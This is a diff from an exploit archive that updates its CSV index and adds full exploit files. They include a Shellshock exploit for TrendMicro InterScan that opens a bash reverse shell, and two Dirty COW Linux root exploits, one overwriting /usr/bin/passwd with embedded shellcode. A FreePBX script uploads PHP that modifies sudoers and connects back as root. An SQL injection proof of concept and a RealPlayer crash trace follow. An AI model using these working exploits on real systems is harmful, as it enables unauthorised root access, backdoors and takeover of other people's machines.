@ -27786,7 +27786,7 @@ id,file,description,date,author,platform,type,port
30762,platforms/php/webapps/30762.txt,"WordPress Plugin WP-SlimStat 0.9.2 - Cross-Site Scripting",2007-11-13,"Fracesco Vaj",php,webapps,0
30763,platforms/linux/dos/30763.php,"KDE Konqueror 3.5.6 - Cookie Handling Denial of Service",2007-11-14,"laurent gaffie",linux,dos,0
30764,platforms/php/webapps/30764.txt,"CONTENTCustomizer 3.1 - Dialog.php Unauthorized Access",2007-11-14,d3hydr8,php,webapps,0
40602,platforms/windows/dos/40602.html,"Microsoft Edge - Array.map Heap Overflow (MS16-119)",2016-10-20,"Google Security Research",windows,dos,0
40602,platforms/windows/dos/40602.html,"Microsoft Edge - 'Array.map' Heap Overflow (MS16-119)",2016-10-20,"Google Security Research",windows,dos,0
30766,platforms/linux/dos/30766.c,"GNU TAR 1.15.91 / CPIO 2.5.90 - safer_name_suffix Remote Denial of Service",2007-11-14,"Dmitry V. Levin",linux,dos,0
30767,platforms/windows/dos/30767.html,"Apple Safari 3.0.x - for Windows Document.Location.Hash Buffer Overflow",2007-06-25,"Azizov E",windows,dos,0
30768,platforms/multiple/remote/30768.txt,"IBM Websphere Application Server 5.1.1 - WebContainer HTTP Request Header Security",2007-11-15,anonymous,multiple,remote,0
@ -27794,7 +27794,7 @@ id,file,description,date,author,platform,type,port
30770,platforms/cgi/webapps/30770.txt,"AIDA Web - Frame.HTML Multiple Unauthorized Access Vulnerabilities",2007-11-14,"MC Iglo",cgi,webapps,0
30771,platforms/multiple/remote/30771.txt,"Aruba MC-800 Mobility Controller - Screens Directory HTML Injection",2007-11-15,"Jan Fry",multiple,remote,0
30772,platforms/windows/remote/30772.html,"ComponentOne FlexGrid 7.1 - ActiveX Control Multiple Buffer Overflow Vulnerabilities",2007-11-15,"Elazar Broad",windows,remote,0
40604,platforms/windows/dos/40604.html,"Microsoft Edge - Array.join Info Leak (MS16-119)",2016-10-20,"Google Security Research",windows,dos,0
40604,platforms/windows/dos/40604.html,"Microsoft Edge - 'Array.join' Infomation Leak (MS16-119)",2016-10-20,"Google Security Research",windows,dos,0
30774,platforms/php/webapps/30774.txt,"Liferay Portal 4.1 Login Script - Cross-Site Scripting",2007-11-16,"Adrian Pastor",php,webapps,0
30775,platforms/asp/webapps/30775.txt,"JiRo's Banner System 2.0 - 'login.asp' Multiple SQL Injection",2007-11-17,"Aria-Security Team",asp,webapps,0
30776,platforms/linux/dos/30776.txt,"LIVE555 Media Server 2007.11.1 - ParseRTSPRequestString Remote Denial Of Service",2007-11-19,"Luigi Auriemma",linux,dos,0
@ -28252,7 +28252,7 @@ id,file,description,date,author,platform,type,port
31282,platforms/php/webapps/31282.txt,"XOOPS Tiny Event 1.01 - 'print' Option SQL Injection",2008-02-21,S@BUN,php,webapps,0
31283,platforms/php/webapps/31283.txt,"PHP-Nuke Downloads Module - 'sid' Parameter SQL Injection",2008-02-21,S@BUN,php,webapps,0
31284,platforms/php/webapps/31284.txt,"XOOPS 'prayerlist' Module - 'cid' Parameter SQL Injection",2008-02-21,S@BUN,php,webapps,0
40355,platforms/multiple/dos/40355.txt,"Adobe Flash - Transform.colorTranform Getter Info Leak",2016-09-08,"Google Security Research",multiple,dos,0
40355,platforms/multiple/dos/40355.txt,"Adobe Flash - Transform.colorTranform Getter Infomation Leak",2016-09-08,"Google Security Research",multiple,dos,0
31285,platforms/multiple/dos/31285.txt,"Zilab Chat and Instant Messaging (ZIM) 2.0/2.1 Server - Multiple Vulnerabilities",2008-02-21,"Luigi Auriemma",multiple,dos,0
31286,platforms/asp/webapps/31286.txt,"Citrix Metaframe Web Manager - 'login.asp' Cross-Site Scripting",2008-02-22,Handrix,asp,webapps,0
31287,platforms/php/webapps/31287.txt,"PHP-Nuke Recipe Module 1.3 - 'recipeid' Parameter SQL Injection",2008-02-23,S@BUN,php,webapps,0
@ -36677,9 +36677,9 @@ id,file,description,date,author,platform,type,port
40569,platforms/java/webapps/40569.txt,"ManageEngine ServiceDesk Plus 9.2 Build 9207 - Unauthorized Information Disclosure",2016-10-18,p0z,java,webapps,0
40570,platforms/osx/dos/40570.py,"The Unarchiver 3.11.1 - '.tar.Z' Crash PoC",2016-10-18,"Antonio Z.",osx,dos,0
40571,platforms/cgi/webapps/40571.pl,"Cgiemail 1.6 - Source Code Disclosure",2016-10-18,"Finbar Crago",cgi,webapps,80
40572,platforms/windows/local/40572.cs,"Windows DFS Client Driver - Arbitrary Drive Mapping Privilege Escalation (MS16-123)",2016-10-18,"Google Security Research",windows,local,0
40573,platforms/windows/local/40573.cs,"Windows DeviceApi CMApi - PiCMOpenDeviceKey Arbitrary Registry Key Write Privilege Escalation (MS16-124)",2016-10-18,"Google Security Research",windows,local,0
40574,platforms/windows/local/40574.cs,"Windows DeviceApi CMApi - User Hive Impersonation Privilege Escalation (MS16-124)",2016-10-18,"Google Security Research",windows,local,0
40572,platforms/windows/local/40572.cs,"Microsoft Windows - DFS Client Driver Arbitrary Drive Mapping Privilege Escalation (MS16-123)",2016-10-18,"Google Security Research",windows,local,0
40573,platforms/windows/local/40573.cs,"Microsoft Windows - DeviceApi CMApi PiCMOpenDeviceKey Arbitrary Registry Key Write Privilege Escalation (MS16-124)",2016-10-18,"Google Security Research",windows,local,0
40574,platforms/windows/local/40574.cs,"Microsoft Windows - DeviceApi CMApi User Hive Impersonation Privilege Escalation (MS16-124)",2016-10-18,"Google Security Research",windows,local,0
40576,platforms/php/webapps/40576.py,"XhP CMS 0.5.1 - Cross-Site Request Forgery / Persistent Cross-Site Scripting",2016-10-19,"Ahsan Tahir",php,webapps,0
40577,platforms/windows/local/40577.txt,"IObit Advanced SystemCare 10.0.2 - Unquoted Service Path Privilege Escalation",2016-10-19,Amir.ght,windows,local,0
40578,platforms/windows/local/40578.py,"HikVision Security Systems - Activex Buffer Overflow",2016-10-19,"Yuriy Gurkin",windows,local,0
@ -36702,14 +36702,21 @@ id,file,description,date,author,platform,type,port
40595,platforms/php/webapps/40595.txt,"SPIP 3.1.2 Template Compiler/Composer - PHP Code Execution",2016-10-20,Sysdream,php,webapps,80
40596,platforms/php/webapps/40596.txt,"SPIP 3.1.1 / 3.1.2 - File Enumeration / Path Traversal",2016-10-20,Sysdream,php,webapps,80
40597,platforms/php/webapps/40597.txt,"SPIP 3.1.2 - Cross-Site Request Forgery",2016-10-20,Sysdream,php,webapps,80
40598,platforms/windows/dos/40598.txt,"Windows win32k.sys - TTF Processing RCVT TrueType Instruction Handler Out-of-Bounds Read (MS16-120)",2016-10-20,"Google Security Research",windows,dos,0
40599,platforms/windows/dos/40599.txt,"Windows win32k.sys - TTF Processing win32k!sbit_Embolden / win32k!ttfdCloseFontContext Use-After-Free (MS16-120)",2016-10-20,"Google Security Research",windows,dos,0
40600,platforms/windows/dos/40600.txt,"Windows Kernel - Registry Hive Loading Negative RtlMoveMemory Size in nt!CmpCheckValueList (MS16-124)",2016-10-20,"Google Security Research",windows,dos,0
40601,platforms/windows/dos/40601.txt,"Windows Kernel - Registry Hive Loading Relative Arbitrary Read in nt!RtlValidRelativeSecurityDescriptor (MS16-123)",2016-10-20,"Google Security Research",windows,dos,0
40603,platforms/windows/dos/40603.html,"Microsoft Edge - Function.apply Info Leak (MS16-119)",2016-10-20,"Google Security Research",windows,dos,0
40598,platforms/windows/dos/40598.txt,"Microsoft Windows - 'win32k.sys' TTF Processing RCVT TrueType Instruction Handler Out-of-Bounds Read (MS16-120)",2016-10-20,"Google Security Research",windows,dos,0
40599,platforms/windows/dos/40599.txt,"Microsoft Windows - 'win32k.sys' TTF Processing win32k!sbit_Embolden / win32k!ttfdCloseFontContext Use-After-Free (MS16-120)",2016-10-20,"Google Security Research",windows,dos,0
40600,platforms/windows/dos/40600.txt,"Microsoft Windows Kernel - Registry Hive Loading Negative RtlMoveMemory Size in nt!CmpCheckValueList (MS16-124)",2016-10-20,"Google Security Research",windows,dos,0
40601,platforms/windows/dos/40601.txt,"Microsoft Windows Kernel - Registry Hive Loading Relative Arbitrary Read in nt!RtlValidRelativeSecurityDescriptor (MS16-123)",2016-10-20,"Google Security Research",windows,dos,0
40603,platforms/windows/dos/40603.html,"Microsoft Edge - Function.apply Infomation Leak (MS16-119)",2016-10-20,"Google Security Research",windows,dos,0
40605,platforms/windows/dos/40605.html,"Microsoft Edge - Spread Operator Stack Overflow (MS16-119)",2016-10-20,"Google Security Research",windows,dos,0
40606,platforms/windows/local/40606.cpp,"Windows Edge/IE - Isolated Private Namespace Insecure DACL Privilege Escalation (MS16-118)",2016-10-20,"Google Security Research",windows,local,0
40607,platforms/windows/local/40607.cpp,"Windows Edge/IE - Isolated Private Namespace Insecure Boundary Descriptor Privilege Escalation (MS16-118)",2016-10-20,"Google Security Research",windows,local,0
40606,platforms/windows/local/40606.cpp,"Microsoft Windows Edge/Internet Explorer - Isolated Private Namespace Insecure DACL Privilege Escalation (MS16-118)",2016-10-20,"Google Security Research",windows,local,0
40607,platforms/windows/local/40607.cpp,"Microsoft Windows Edge/Internet Explorer - Isolated Private Namespace Insecure Boundary Descriptor Privilege Escalation (MS16-118)",2016-10-20,"Google Security Research",windows,local,0
40608,platforms/windows/local/40608.cs,"Windows - NtLoadKeyEx Read Only Hive Arbitrary File Write Privilege Escalation (MS16-124)",2016-10-20,"Google Security Research",windows,local,0
40609,platforms/linux/remote/40609.rb,"Hak5 WiFi Pineapple - Preconfiguration Command Injection (Metasploit)",2016-10-20,Metasploit,linux,remote,1471
40610,platforms/linux/remote/40610.rb,"OpenNMS - Java Object Unserialization Remote Code Execution (Metasploit)",2016-10-20,Metasploit,linux,remote,1099
40611,platforms/linux/local/40611.c,"Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' Race Condition Privilege Escalation (Write Access)",2016-10-19,"Phil Oester",linux,local,0
40612,platforms/php/webapps/40612.txt,"Just Dial Clone Script - SQL Injection",2016-10-21,"Arbin Godar",php,webapps,0
40614,platforms/php/webapps/40614.py,"FreePBX 10.13.66 - Remote Command Execution / Privilege Escalation",2016-10-21,"Christopher Davis",php,webapps,0
40617,platforms/windows/dos/40617.txt,"RealPlayer 18.1.5.705 - '.QCP' Crash (PoC)",2016-10-21,"Alwin Peppels",windows,dos,0
40616,platforms/linux/local/40616.c,"Linux Kernel 2.6.22 < 3.9 (x86/x64) - 'Dirty COW' Race Condition Privilege Escalation (SUID)",2016-10-21,"Robin Verton",linux,local,0
40618,platforms/windows/dos/40618.py,"Oracle VM VirtualBox 4.3.28 - '.ovf' Crash (PoC)",2016-10-21,"sultan albalawi",windows,dos,0
40619,platforms/hardware/remote/40619.py,"TrendMicro InterScan Web Security Virtual Appliance - Remote Code Execution (Shellshock)",2016-10-21,"Hacker Fantastic",hardware,remote,0

Can't render this file because it is too large.

63
platforms/hardware/remote/40619.py Executable file
View file

@ -0,0 +1,63 @@
#!/usr/bin/env python
# TrendMicro InterScan Web Security Virtul Appliance
# ==================================================
# InterScan Web Security is a software virtual appliance that
# dynamically protects against the ever-growing flood of web
# threats at the Internet gateway exclusively designed to secure
# you against traditional and emerging web threats at the Internet
# gateway. The appliance however is shipped with a vulnerable
# version of Bash susceptible to shellshock (I know right?). An
# attacker can exploit this vulnerability by calling the CGI
# shellscript "/cgi-bin/cgiCmdNotify" which can be exploited
# to perform arbitrary code execution. A limitation of this
# vulnerability is that the attacker must have credentials for
# the admin web interface to exploit this flaw. The panel runs
# over HTTP by default so a man-in-the-middle attack could be
# used to gain credentials and compromise the appliance.
#
# $ python trendmicro_IWSVA_shellshock.py 192.168.56.101 admin password 192.168.56.1
# [+] TrendMicro InterScan Web Security Virtual Appliance CVE-2014-6271 exploit
# [-] Authenticating to '192.168.56.101' with 'admin' 'password'
# [-] JSESSIONID = DDE38E62757ADC00A51311F1F953EEBA
# [-] exploiting shellshock CVE-2014-6271...
# bash: no job control in this shell
# bash-4.1$ id
# uid=498(iscan) gid=499(iscan) groups=499(iscan)
#
# -- Hacker Fantastic
#
# (https://www.myhackerhouse.com)
import SimpleHTTPServer
import subprocess
import requests
import sys
import os
def spawn_listener():
os.system("nc -l 8080")
def shellshock(ip,session,cbip):
user_agent = {'User-agent': '() { :; }; /bin/bash -i >& /dev/tcp/'+cbip+'/8080 0>&1'}
cookies = {'JSESSIONID': session}
print "[-] exploiting shellshock CVE-2014-6271..."
myreq = requests.get("http://"+ip+":1812/cgi-bin/cgiCmdNotify", headers = user_agent, cookies = cookies)
def login_http(ip,user,password):
mydata = {'wherefrom':'','wronglogon':'no','uid':user, 'passwd':password,'pwd':'Log+On'}
print "[-] Authenticating to '%s' with '%s' '%s'" % (ip,user,password)
myreq = requests.post("http://"+ip+":1812/uilogonsubmit.jsp", data=mydata)
session_cookie = myreq.history[0].cookies.get('JSESSIONID')
print "[-] JSESSIONID = %s" % session_cookie
return session_cookie
if __name__ == "__main__":
print "[+] TrendMicro InterScan Web Security Virtual Appliance CVE-2014-6271 exploit"
if len(sys.argv) < 5:
print "[-] use with <ip> <user> <pass> <connectback_ip>"
sys.exit()
newRef=os.fork()
if newRef==0:
spawn_listener()
else:
session = login_http(sys.argv[1],sys.argv[2],sys.argv[3])
shellshock(sys.argv[1],session,sys.argv[4])

110
platforms/linux/local/40611.c Executable file
View file

@ -0,0 +1,110 @@
/*
####################### dirtyc0w.c #######################
$ sudo -s
# echo this is not a test > foo
# chmod 0404 foo
$ ls -lah foo
-r-----r-- 1 root root 19 Oct 20 15:23 foo
$ cat foo
this is not a test
$ gcc -lpthread dirtyc0w.c -o dirtyc0w
$ ./dirtyc0w foo m00000000000000000
mmap 56123000
madvise 0
procselfmem 1800000000
$ cat foo
m00000000000000000
####################### dirtyc0w.c #######################
*/
#include <stdio.h>
#include <sys/mman.h>
#include <fcntl.h>
#include <pthread.h>
#include <unistd.h>
#include <sys/stat.h>
#include <string.h>
void *map;
int f;
struct stat st;
char *name;
void *madviseThread(void *arg)
{
char *str;
str=(char*)arg;
int i,c=0;
for(i=0;i<100000000;i++)
{
/*
You have to race madvise(MADV_DONTNEED) :: https://access.redhat.com/security/vulnerabilities/2706661
> This is achieved by racing the madvise(MADV_DONTNEED) system call
> while having the page of the executable mmapped in memory.
*/
c+=madvise(map,100,MADV_DONTNEED);
}
printf("madvise %d\n\n",c);
}
void *procselfmemThread(void *arg)
{
char *str;
str=(char*)arg;
/*
You have to write to /proc/self/mem :: https://bugzilla.redhat.com/show_bug.cgi?id=1384344#c16
> The in the wild exploit we are aware of doesn't work on Red Hat
> Enterprise Linux 5 and 6 out of the box because on one side of
> the race it writes to /proc/self/mem, but /proc/self/mem is not
> writable on Red Hat Enterprise Linux 5 and 6.
*/
int f=open("/proc/self/mem",O_RDWR);
int i,c=0;
for(i=0;i<100000000;i++) {
/*
You have to reset the file pointer to the memory position.
*/
lseek(f,map,SEEK_SET);
c+=write(f,str,strlen(str));
}
printf("procselfmem %d\n\n", c);
}
int main(int argc,char *argv[])
{
/*
You have to pass two arguments. File and Contents.
*/
if (argc<3)return 1;
pthread_t pth1,pth2;
/*
You have to open the file in read only mode.
*/
f=open(argv[1],O_RDONLY);
fstat(f,&st);
name=argv[1];
/*
You have to use MAP_PRIVATE for copy-on-write mapping.
> Create a private copy-on-write mapping. Updates to the
> mapping are not visible to other processes mapping the same
> file, and are not carried through to the underlying file. It
> is unspecified whether changes made to the file after the
> mmap() call are visible in the mapped region.
*/
/*
You have to open with PROT_READ.
*/
map=mmap(NULL,st.st_size,PROT_READ,MAP_PRIVATE,f,0);
printf("mmap %x\n\n",map);
/*
You have to do it on two threads.
*/
pthread_create(&pth1,NULL,madviseThread,argv[1]);
pthread_create(&pth2,NULL,procselfmemThread,argv[2]);
/*
You have to wait for the threads to finish.
*/
pthread_join(pth1,NULL);
pthread_join(pth2,NULL);
return 0;
}

156
platforms/linux/local/40616.c Executable file
View file

@ -0,0 +1,156 @@
/*
* (un)comment correct payload first (x86 or x64)!
*
* $ gcc cowroot.c -o cowroot -pthread
* $ ./cowroot
* DirtyCow root privilege escalation
* Backing up /usr/bin/passwd.. to /tmp/bak
* Size of binary: 57048
* Racing, this may take a while..
* /usr/bin/passwd is overwritten
* Popping root shell.
* Don't forget to restore /tmp/bak
* thread stopped
* thread stopped
* root@box:/root/cow# id
* uid=0(root) gid=1000(foo) groups=1000(foo)
*/
#include <stdio.h>
#include <stdlib.h>
#include <sys/mman.h>
#include <fcntl.h>
#include <pthread.h>
#include <string.h>
#include <unistd.h>
void *map;
int f;
int stop = 0;
struct stat st;
char *name;
pthread_t pth1,pth2,pth3;
// change if no permissions to read
char suid_binary[] = "/usr/bin/passwd";
/*
* $ msfvenom -p linux/x64/exec CMD=/bin/bash PrependSetuid=True -f elf | xxd -i
*/
unsigned char sc[] = {
0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x3e, 0x00, 0x01, 0x00, 0x00, 0x00,
0x78, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38, 0x00, 0x01, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00,
0xb1, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xea, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x48, 0x31, 0xff, 0x6a, 0x69, 0x58, 0x0f, 0x05, 0x6a, 0x3b, 0x58, 0x99,
0x48, 0xbb, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x73, 0x68, 0x00, 0x53, 0x48,
0x89, 0xe7, 0x68, 0x2d, 0x63, 0x00, 0x00, 0x48, 0x89, 0xe6, 0x52, 0xe8,
0x0a, 0x00, 0x00, 0x00, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x62, 0x61, 0x73,
0x68, 0x00, 0x56, 0x57, 0x48, 0x89, 0xe6, 0x0f, 0x05
};
unsigned int sc_len = 177;
/*
* $ msfvenom -p linux/x86/exec CMD=/bin/bash PrependSetuid=True -f elf | xxd -i
unsigned char sc[] = {
0x7f, 0x45, 0x4c, 0x46, 0x01, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x03, 0x00, 0x01, 0x00, 0x00, 0x00,
0x54, 0x80, 0x04, 0x08, 0x34, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x34, 0x00, 0x20, 0x00, 0x01, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x80, 0x04, 0x08, 0x00, 0x80, 0x04, 0x08, 0x88, 0x00, 0x00, 0x00,
0xbc, 0x00, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00,
0x31, 0xdb, 0x6a, 0x17, 0x58, 0xcd, 0x80, 0x6a, 0x0b, 0x58, 0x99, 0x52,
0x66, 0x68, 0x2d, 0x63, 0x89, 0xe7, 0x68, 0x2f, 0x73, 0x68, 0x00, 0x68,
0x2f, 0x62, 0x69, 0x6e, 0x89, 0xe3, 0x52, 0xe8, 0x0a, 0x00, 0x00, 0x00,
0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x62, 0x61, 0x73, 0x68, 0x00, 0x57, 0x53,
0x89, 0xe1, 0xcd, 0x80
};
unsigned int sc_len = 136;
*/
void *madviseThread(void *arg)
{
char *str;
str=(char*)arg;
int i,c=0;
for(i=0;i<1000000 && !stop;i++) {
c+=madvise(map,100,MADV_DONTNEED);
}
printf("thread stopped\n");
}
void *procselfmemThread(void *arg)
{
char *str;
str=(char*)arg;
int f=open("/proc/self/mem",O_RDWR);
int i,c=0;
for(i=0;i<1000000 && !stop;i++) {
lseek(f,map,SEEK_SET);
c+=write(f, str, sc_len);
}
printf("thread stopped\n");
}
void *waitForWrite(void *arg) {
char buf[sc_len];
for(;;) {
FILE *fp = fopen(suid_binary, "rb");
fread(buf, sc_len, 1, fp);
if(memcmp(buf, sc, sc_len) == 0) {
printf("%s is overwritten\n", suid_binary);
break;
}
fclose(fp);
sleep(1);
}
stop = 1;
printf("Popping root shell.\n");
printf("Don't forget to restore /tmp/bak\n");
system(suid_binary);
}
int main(int argc,char *argv[]) {
char *backup;
printf("DirtyCow root privilege escalation\n");
printf("Backing up %s.. to /tmp/bak\n", suid_binary);
asprintf(&backup, "cp %s /tmp/bak", suid_binary);
system(backup);
f = open(suid_binary,O_RDONLY);
fstat(f,&st);
printf("Size of binary: %d\n", st.st_size);
char payload[st.st_size];
memset(payload, 0x90, st.st_size);
memcpy(payload, sc, sc_len+1);
map = mmap(NULL,st.st_size,PROT_READ,MAP_PRIVATE,f,0);
printf("Racing, this may take a while..\n");
pthread_create(&pth1, NULL, &madviseThread, suid_binary);
pthread_create(&pth2, NULL, &procselfmemThread, payload);
pthread_create(&pth3, NULL, &waitForWrite, NULL);
pthread_join(pth3, NULL);
return 0;
}

12
platforms/php/webapps/40612.txt Executable file
View file

@ -0,0 +1,12 @@
# Exploit Title: SQL Injection in Just Dial Clone Script
# Date: 20 October 2016
# Exploit Author: Arbin Godar
# Website : ArbinGodar.com
# Vendor: http://www.i-netsolution.com/
*----------------------------------------------------------------------------------------------------------------------*
# Proof of Concept SQL Injection/Exploit :
http://localhost/[PATH]/category-view-list.php?srch=PoC%27
*----------------------------------------------------------------------------------------------------------------------*

112
platforms/php/webapps/40614.py Executable file
View file

@ -0,0 +1,112 @@
#!/usr/bin/env python
'''
Title | FreePBX 13 Remote Command Execution and Privilege Escalation
Date | 10/21/2016
Author | Christopher Davis
Vendor | https://www.freepbx.org/
Version | FreePBX 13 & 14 (System Recordings Module versions: 13.0.1beta1 - 13.0.26)
Tested on | http://downloads.freepbxdistro.org/ISO/FreePBX-64bit-10.13.66.iso
http://downloads.freepbxdistro.org/ISO/FreePBX-32bit-10.13.66.iso
Purpose | This script exploits the freepbx website, elevates privileges and returns a reverse bind tcp as root
Usage | python pbx.py -u http://10.2.2.109 -l 10.2.2.115 -p 4444 -s r
Orig Author | pgt - nullsecurity.net
'''
import re
import subprocess
import argparse
import random
import time
import socket
import threading
#This portion will check for requests and prompt user to install it if not already
try:
import requests
except:
try:
while True:
choice = raw_input('Requests library not found but is needed. Install? \'Y\'es or \'N\'o?\n:')
if choice.lower() == 'y':
subprocess.call('pip install requests',shell=True)
import requests
break
elif choice.lower() == 'n':
exit()
else:
continue
except Exception as e:
print(e)
exit()
#Since subprocess.call will bind, we start this thread sepparate to execute after our netcat bind
def delayGet():
global args
try:
time.sleep(5)
requests.get(args.url+ '0x4148.php.call', verify=False)
except:
pass
if __name__ == '__main__':
try:
parser = argparse.ArgumentParser()
parser.add_argument('-u', type=str, help='hostname and path. Ex- http://192.168.1.1/path/', dest='url')
parser.add_argument('-l', type=str, help='localhost ip to listen on', dest='lhost')
parser.add_argument('-p', type=str, help='port to listen on', dest='lport')
parser.add_argument('-s', type=str, help="'L'ocal or 'R'oot shell attempt", dest='shell')
parser.add_help
args = parser.parse_args()
#Make sure args were passed
if args.url == None or args.lhost == None or args.lport == None or not bool(re.search(r'^(?:[L|l]|[r|R])$', args.shell)):
parser.print_help()
print("\nUsage: python freepbx.py -u http://10.2.2.109 -l 10.2.2.115 -p 4444")
exit()
#Make sure the http url is there
if bool(re.search('[hH][tT][tT][pP][sS]?\:\/\/', args.url)) == False:
print('There is something wrong with your url. It needs to have http:// or https://\n\n')
exit()
#make sure / is there, if not, put it there
if args.url[-1:] != '/':
args.url += '/'
#python -c 'import pty; pty.spawn("/bin/sh")'
#this is the php we will upload to get a reverse shell. System call to perform reverse bash shell. Nohup spawns a new process in case php dies
#if version 13, lets try to get root, otherwise
if args.shell.upper() == 'R':
cmdshell = '<?php fwrite(fopen("hackerWAShere.py","w+"),base64_decode("IyEvdXNyL2Jpbi9lbnYgcHl0aG9uDQppbXBvcnQgc3VicHJvY2Vzcw0KaW1wb3J0IHRpbWUNCiMgLSotIGNvZGluZzogdXRmLTggLSotIA0KY21kID0gJ3NlZCAtaSBcJ3MvQ29tIEluYy4vQ29tIEluYy5cXG5lY2hvICJhc3RlcmlzayBBTEw9XChBTExcKVwgICcgXA0KCSdOT1BBU1NXRFw6QUxMIlw+XD5cL2V0Y1wvc3Vkb2Vycy9nXCcgL3Zhci9saWIvJyBcDQoJJ2FzdGVyaXNrL2Jpbi9mcmVlcGJ4X2VuZ2luZScNCnN1YnByb2Nlc3MuY2FsbChjbWQsIHNoZWxsPVRydWUpDQpzdWJwcm9jZXNzLmNhbGwoJ2VjaG8gYSA+IC92YXIvc3Bvb2wvYXN0ZXJpc2svc3lzYWRtaW4vYW1wb3J0YWxfcmVzdGFydCcsIHNoZWxsPVRydWUpDQp0aW1lLnNsZWVwKDIwKQ==")); system("python hackerWAShere.py; nohup sudo bash -i >& /dev/tcp/'+args.lhost+'/'+args.lport+' 0>&1 ");?>'
else:
cmdshell = "<?php system('nohup bash -i >& /dev/tcp/"+args.lhost+"/"+args.lport+" 0>&1 ');?>"
#creates a session
session = requests.Session()
print('\nStarting Session')
session.get(args.url, verify=False)
print('\nScraping the site for a cookie')
HEADERS = {"User-Agent":"Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0", "Accept": 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', "Accept-Language":"en-US,en;q=0.5","Referer": args.url + 'admin/ajax.php', 'Connection': 'keep-alive', 'Upgrade-Insecure-Requests': '1'}
print('\nPosting evil php')
postData = {'module':'hotelwakeup','command':'savecall','day':'now','time':'+1 week','destination':"/../../../../../../var/www/html/0x4148.php","language":cmdshell}
result = session.post(args.url + 'admin/ajax.php', headers=HEADERS, data=postData, verify=False)
if 'Whoops' not in result.text:
print(result.text)
print('\nSomething Went wrong. Was expecting a Whoops but none found.')
exit()
#calls the get thread which will execute 5 seconds after the netcat bind
print('\nStarting new thread for getting evil php')
z = threading.Thread(target=delayGet)
z.daemon = True
z.start()
print('\nBinding to socket '+ args.lport + ' Please wait... May take 30 secs to get call back.\n')
#This binds our terminal with netcat and waits for the call back
try:
subprocess.call('nc -nvlp '+args.lport, shell=True)
except Exception as e:
print(e)
print('\nIf you saw the message "sudo: no tty present and no askpass program specified", please try again and it may work.')
except Exception as e:
print(e)
print('\nSee above error')

200
platforms/windows/dos/40617.txt Executable file
View file

@ -0,0 +1,200 @@
Tested on: Win7 / Win10 x64
Date: October 20th 2016
Vendor homepage: http://www.real.com
Software link: http://realplayer-download.real.com/free/windows/installer/stubinst/stub/rt1/T10EUDRP/RealTimes-RealPlayer.exe
File version (both realplay.exe and qcpfformat.dll): 18.1.5.705
Exploit author: Alwin Peppels
Found with: Peach Fuzzer
Context:
eax=00000002 ebx=00000000 ecx=0d4cb9a0 edx=00000000 esi=00000000 edi=046abd0c
eip=534013dc esp=00d7e254 ebp=00d7e254 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202
qcpfformat+0x13dc:
534013dc 0fb64203 movzx eax,byte ptr [edx+3] ds:002b:00000003=??
Call stack:
# ChildEBP RetAddr Args to Child
WARNING: Stack unwind information not available. Following frames may be wrong.
00 00d7e254 53401e92 00000000 00000000 0d4cb9a0 qcpfformat+0x13dc
01 00d7e2a4 53403342 046abd0c 80004005 00000000 qcpfformat+0x1e92
02 00d7e2d8 53402d37 1d26bbf0 74617276 534018a9 qcpfformat!RMACreateInstance+0xc62
03 00d7e308 534030cb 046abd0c 00000000 74617276 qcpfformat!RMACreateInstance+0x657
04 00d7e328 533e20f0 1ee51040 00000000 00000008 qcpfformat!RMACreateInstance+0x9eb
05 00d7e348 533e1da6 00000008 00d7e370 00000005 smplfsys+0x20f0
06 00d7e374 533e3582 00d7e394 00000000 00000000 smplfsys+0x1da6
07 00d7e38c 5340349f 00000000 00000008 00000000 smplfsys+0x3582
08 00d7e3b4 533e3cd9 00d7e3d0 0d4cb9a4 0d4cb9a4 qcpfformat!RMACreateInstance+0xdbf
09 00d7e3c8 53403597 00000000 00000000 00000000 smplfsys+0x3cd9
0a 00d7e444 533e283c 1d26bbf8 0d4cb9a4 0d4cb9a0 qcpfformat!RMACreateInstance+0xeb7
0b 00d7e460 53402c51 1d26bbf0 00000005 0d4cb9a0 smplfsys+0x283c
0c 00d7e488 57a8a692 1d190950 0ce86fd8 1d26bd48 qcpfformat!RMACreateInstance+0x571
0d 00d7e4f0 57a8adfd 0d49dd78 5865cb7c 00d7e528 mametadata!SetDLLAccessPath+0x18392
0e 00d7e568 585afd7c 0d4aca0c 046a2610 5865cb7c mametadata!SetDLLAccessPath+0x18afd
0f 00d7e5ac 585af1d0 1d26c088 00d7e5fc 00000000 rpcl3260!RMAShutdown+0x2584c
10 00d7e5c0 585ae90a 00000000 1d26c088 03ecd74c rpcl3260!RMAShutdown+0x24ca0
11 00d7e5d8 57c788ba 1d26c088 00d7e5fc 03ecd74c rpcl3260!RMAShutdown+0x243da
